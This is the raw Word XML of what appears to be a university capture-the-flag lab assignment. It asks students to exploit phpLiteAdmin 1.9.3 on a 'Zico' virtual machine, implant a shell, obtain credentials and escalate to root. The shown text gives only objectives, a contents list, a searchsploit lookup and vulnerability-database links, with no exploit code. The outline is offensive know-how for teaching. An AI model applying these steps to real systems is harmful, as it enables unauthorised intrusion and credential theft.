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61B93" w14:textId="77777777" w:rsidR="002148DE" w:rsidRPr="004B04B5" w:rsidRDefault="002148DE" w:rsidP="00EC002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eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D5E092" w14:textId="3E5BFCEB" w:rsidR="00EC0022" w:rsidRPr="004B04B5" w:rsidRDefault="00EC0022" w:rsidP="00EC002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eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B04B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>OBJE</w:t>
      </w:r>
      <w:r w:rsidR="00147A58" w:rsidRPr="004B04B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>CTIVES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A029D5C" w14:textId="77777777" w:rsidR="00147A58" w:rsidRPr="004B04B5" w:rsidRDefault="00147A58" w:rsidP="00EC002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eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65152DD5" w14:textId="77777777" w:rsidR="00EC0022" w:rsidRPr="004B04B5" w:rsidRDefault="00EC0022" w:rsidP="00EC0022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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B04B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>GENERAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D694DE8" w14:textId="433BDEDB" w:rsidR="00147A58" w:rsidRPr="004B04B5" w:rsidRDefault="007D3CE7" w:rsidP="005953D9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1"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Develop offensive skills using a Kali Linux distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B46ADF" w14:textId="77777777" w:rsidR="002148DE" w:rsidRPr="004B04B5" w:rsidRDefault="002148DE" w:rsidP="00EC0022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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4274CD72" w14:textId="3B64BDAE" w:rsidR="00EC0022" w:rsidRPr="004B04B5" w:rsidRDefault="00147A58" w:rsidP="00EC0022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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B04B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>SPECIFIC</w:t>
      </w:r>
      <w:r w:rsidR="00EC0022" w:rsidRPr="004B04B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B0D47" w14:textId="3FE56598" w:rsidR="00147A58" w:rsidRDefault="008B5A06" w:rsidP="005953D9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1"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Understand the concept of a</w:t>
      </w:r>
      <w:r w:rsidR="007D3CE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTF (Capture the Flag) exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9795E8" w14:textId="5E5E5051" w:rsidR="007D3CE7" w:rsidRDefault="008B5A06" w:rsidP="005953D9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1"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">Get different flags related with identification of </w:t>
      </w:r>
      <w:r w:rsidR="00BD3AF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F3F50F" w14:textId="0B6A082A" w:rsidR="008B5A06" w:rsidRPr="008B5A06" w:rsidRDefault="008B5A06" w:rsidP="00922B03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1"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B5A06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">different exploits to get confidential information of </w:t>
      </w:r>
      <w:r w:rsidR="00BD3AF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB8FFB4" w14:textId="77777777" w:rsidR="00DE0CE4" w:rsidRPr="004B04B5" w:rsidRDefault="00DE0CE4" w:rsidP="00DE0C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1"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD32498" w14:textId="4377E44A" w:rsidR="00C64775" w:rsidRDefault="007D3CE7" w:rsidP="00EE307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n-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3CE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>This laboratory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> is intended to be developed </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>individually</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697DC565" w14:textId="524D0F4F" w:rsidR="008140B8" w:rsidRDefault="008140B8" w:rsidP="00EE307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n-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715118F8" w14:textId="4F37E90A" w:rsidR="008140B8" w:rsidRDefault="008140B8" w:rsidP="00EE307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n-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E9F1F9E" w14:textId="77777777" w:rsidR="008140B8" w:rsidRDefault="008140B8">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
      </w:pPr>
      <w:r>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47299D45" w14:textId="76286046" w:rsidR="00537CDB" w:rsidRPr="001671E5" w:rsidRDefault="008140B8">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US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o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc17521198" w:history="1">
        <w:r w:rsidR="00537CDB" w:rsidRPr="00734AF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US" w:eastAsia="es-CO"/>
          </w:rPr>
          <w:t>FLAG 4: Find and exploit a vulnerability in phpLiteAdmin</w:t>
        </w:r>
        <w:r w:rsidR="00537CDB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00537CDB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00537CDB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc17521198 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00537CDB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00537CDB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00537CDB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00537CDB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22833BC8" w14:textId="7A021905" w:rsidR="00537CDB" w:rsidRPr="001671E5" w:rsidRDefault="00537CDB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc17521199" w:history="1">
        <w:r w:rsidRPr="00734AF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US" w:eastAsia="es-CO"/>
          </w:rPr>
          <w:t>FLAG 5: Implant a shell in the ZICO server virtual mach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1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F9927B9" w14:textId="46602E0F" w:rsidR="00537CDB" w:rsidRPr="001671E5" w:rsidRDefault="00537CDB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc17521200" w:history="1">
        <w:r w:rsidRPr="00734AF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US" w:eastAsia="es-CO"/>
          </w:rPr>
          <w:t>FLAG 6: Get the Zico user credenti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1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195A34C" w14:textId="05D7FBC1" w:rsidR="00537CDB" w:rsidRPr="001671E5" w:rsidRDefault="00537CDB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc17521201" w:history="1">
        <w:r w:rsidRPr="00734AF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US" w:eastAsia="es-CO"/>
          </w:rPr>
          <w:t>Optional: (No Mandator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1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A67233" w14:textId="5766BD75" w:rsidR="00537CDB" w:rsidRPr="001671E5" w:rsidRDefault="00537CDB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc17521202" w:history="1">
        <w:r w:rsidRPr="00734AF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US" w:eastAsia="es-CO"/>
          </w:rPr>
          <w:t>FLAG 7: Get access as root (Elevation of privileges)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1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98CF133" w14:textId="61DF1B5D" w:rsidR="008140B8" w:rsidRDefault="008140B8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47515025" w14:textId="77777777" w:rsidR="008140B8" w:rsidRPr="007D3CE7" w:rsidRDefault="008140B8" w:rsidP="00EE307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n-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5859EFA6" w14:textId="4D54A8D8" w:rsidR="008140B8" w:rsidRDefault="008140B8" w:rsidP="008140B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DE5536" w14:textId="1DDFFD9D" w:rsidR="008140B8" w:rsidRDefault="008140B8" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35112CCE" w14:textId="45311E60" w:rsidR="00960C98" w:rsidRDefault="00960C98" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08673347" w14:textId="1D061E23" w:rsidR="00960C98" w:rsidRDefault="00960C98" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EBEF365" w14:textId="62667629" w:rsidR="00960C98" w:rsidRDefault="00960C98" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCFE8BA" w14:textId="58558BB7" w:rsidR="00960C98" w:rsidRDefault="00960C98" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DDC338" w14:textId="2EE76087" w:rsidR="00960C98" w:rsidRDefault="00960C98" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6ED64F" w14:textId="25548107" w:rsidR="00960C98" w:rsidRDefault="00960C98" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E6BE70" w14:textId="746CEF34" w:rsidR="00960C98" w:rsidRDefault="00960C98" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1221993A" w14:textId="684C88AB" w:rsidR="00960C98" w:rsidRDefault="00960C98" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B23F9B6" w14:textId="77777777" w:rsidR="00960C98" w:rsidRPr="008140B8" w:rsidRDefault="00960C98" w:rsidP="008140B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="430B6903" w14:textId="25A65DE1" w:rsidR="00FC4493" w:rsidRDefault="00BD3AF1" w:rsidP="008140B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc17521198"/>
      <w:r w:rsidRPr="00FC4493">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">FLAG 4: </w:t>
      </w:r>
      <w:r w:rsidR="001D4DBD">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Find</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4493">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC4493">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">and exploit a </w:t>
      </w:r>
      <w:r w:rsidR="00FC4493" w:rsidRPr="00FC4493">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00FC4493">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00FC4493" w:rsidRPr="00FC4493">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC4493">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00FC4493" w:rsidRPr="00FC4493">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4493" w:rsidRPr="00FC4493">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>phpLiteAdmin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="110C5D46" w14:textId="2262F94F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</w:p>
    <w:p w14:paraId="4A030BFD" w14:textId="7891C516" w:rsidR="00FC4493" w:rsidRP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 w:rsidRPr="00FC4493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">Use different tools to find out vulnerabilities associated to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC4493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>phpLiteAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC4493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> v 1.9.3. Try the following </w:t>
      </w:r>
      <w:r w:rsidR="001D4DBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C5022" w14:textId="7CEAE989" w:rsidR="00FC4493" w:rsidRP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B0E2E05" w14:textId="4BC9D01C" w:rsidR="00FC4493" w:rsidRDefault="00FC4493" w:rsidP="00FC4493">
      <w:pPr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  <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>phpLiteAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69A4DDF0" w14:textId="77777777" w:rsidR="00960C98" w:rsidRDefault="00960C98" w:rsidP="00960C9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</w:p>
    <w:p w14:paraId="4B249721" w14:textId="3B849DC2" w:rsidR="00960C98" w:rsidRPr="00960C98" w:rsidRDefault="00960C98" w:rsidP="00960C9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 w:rsidRPr="00960C98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Other Sources of information about vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1841AFB8" w14:textId="6FAB257D" w:rsidR="00FC4493" w:rsidRDefault="00960C98" w:rsidP="00FC4493">
      <w:pPr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  <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00C24E73">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="en-US" w:eastAsia="es-CO"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/search</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001D4DBD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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30644446" w14:textId="24F193E0" w:rsidR="00FC4493" w:rsidRDefault="001671E5" w:rsidP="00FC4493">
      <w:pPr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  <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="001D4DBD" w:rsidRPr="00B96733">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="en-US" w:eastAsia="es-CO"/>
          </w:rPr>
          <w:t>https://vuldb.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001D4DBD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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD412A6" w14:textId="77777777" w:rsidR="00FC4493" w:rsidRPr="00FC4493" w:rsidRDefault="00FC4493" w:rsidP="00FC449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</w:p>
    <w:p w14:paraId="62CD5024" w14:textId="62C2BFC8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1D4DBD" w:rsidRPr="00853EC8" w14:paraId="0E1B220A" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B72619" w14:textId="3ECE8EFF" w:rsidR="001D4DBD" w:rsidRPr="00853EC8" w:rsidRDefault="001D4DB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  <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00853EC8">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Replace this screenshot with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51E03571" w14:textId="77777777" w:rsidR="001D4DBD" w:rsidRPr="00853EC8" w:rsidRDefault="001D4DB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  <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74CA9797" w14:textId="5CA212C6" w:rsidR="001D4DBD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4422D7D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442.2pt;height:103.9pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId10" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="1526D737" w14:textId="65C5EAB9" w:rsidR="001D4DBD" w:rsidRPr="00853EC8" w:rsidRDefault="001D4DB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64443977" w14:textId="77777777" w:rsidR="001D4DBD" w:rsidRDefault="001D4DB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0FDCDF0" w14:textId="03D26275" w:rsidR="001D4DBD" w:rsidRDefault="001D4DB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1D4DBD" w:rsidRPr="00960C98" w14:paraId="5F7CDCEB" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
